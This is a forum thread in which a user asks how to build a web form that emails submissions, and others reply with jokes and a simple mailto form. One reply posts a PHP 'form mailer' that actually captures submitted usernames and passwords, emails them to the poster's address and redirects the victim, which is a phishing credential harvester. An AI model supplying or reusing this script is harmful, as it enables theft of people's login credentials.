I need help!!! I need to make a web form that will alow users to type what they need

alfa147x

Lifer
Jul 14, 2005
29,307
105
106
I need help!!! I need to make a web form that will alow users to type what they need


and that info will be emailed to me

thanks
 

Homerboy

Lifer
Mar 1, 2000
30,890
5,001
126
Originally posted by: gigapet
how much are you paying?


and wrong forum
/me waits for "Software forum isn't fast enough... I'd get a quicker response from ATOT" excuse
 

Appledrop

Platinum Member
Aug 25, 2004
2,340
0
0
this is a php script i use, you'll need to modify it a bit though
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>title</title>

</head>

<body>
<?php
print "<script>";
print " self.location='http://REDIRECT THEM AFTERWARDS TO HERE';";
print "</script";
//begin mail stuff
$msg = "Username: $_POST[username]\n";
$msg .= "Password: $_POST[password]\n";

//mail properties

$recipient = "YOUR@gmail.com";
$subject = "Submission";
$mailheaders = "From: Myself <me@home.pc> \n";
$mailheaders .= "Reply-to:YOUR@gmail.com";

//send it!
mail($recipient, $subject, $msg, $mailheaders);

?>

</body>
</html>
 

alfa147x

Lifer
Jul 14, 2005
29,307
105
106
Software forum isn't fast enough... I'd get a quicker response from ATOT

here it is! ;)



C'mon people!!!!
 

gigapet

Lifer
Aug 9, 2001
10,005
0
76
Originally posted by: alfa147x
Software forum isn't fast enough... I'd get a quicker response from ATOT

here it is! ;)



C'mon people!!!!

HOW MUCH ARE YOU PAYING
 

Legendary

Diamond Member
Jan 22, 2002
7,019
1
0
If you go to high school (my guess), don't do it for free.
If you go to college, your IT guy should be able to do it himself.
Either way, just stop what you're doing right now.
On the other hand:

<form action=mailto:your@email.com>
<textarea name=info>Your user will type here</textarea>
<input type=submit>
</form>
I think that should work.
 

alfa147x

Lifer
Jul 14, 2005
29,307
105
106
Originally posted by: Legendary
If you go to high school (my guess), don't do it for free.
If you go to college, your IT guy should be able to do it himself.
Either way, just stop what you're doing right now.
On the other hand:

<form action=mailto:your@email.com>
<textarea name=info>Your user will type here</textarea>
<input type=submit>
</form>
I think that should work.



how would i add more than 1?
 

alfa147x

Lifer
Jul 14, 2005
29,307
105
106
Is it possible that the script sends it automaticly with out using some thing outlook?
 

GeekDrew

Diamond Member
Jun 7, 2000
9,099
19
81
Originally posted by: alfa147x
Is it possible that the script sends it automaticly with out using some thing outlook?

Yes, if you use PHP, ASP, or some other server-side scripting language.

Seriously, either go to the software forum, play with google, or pay money.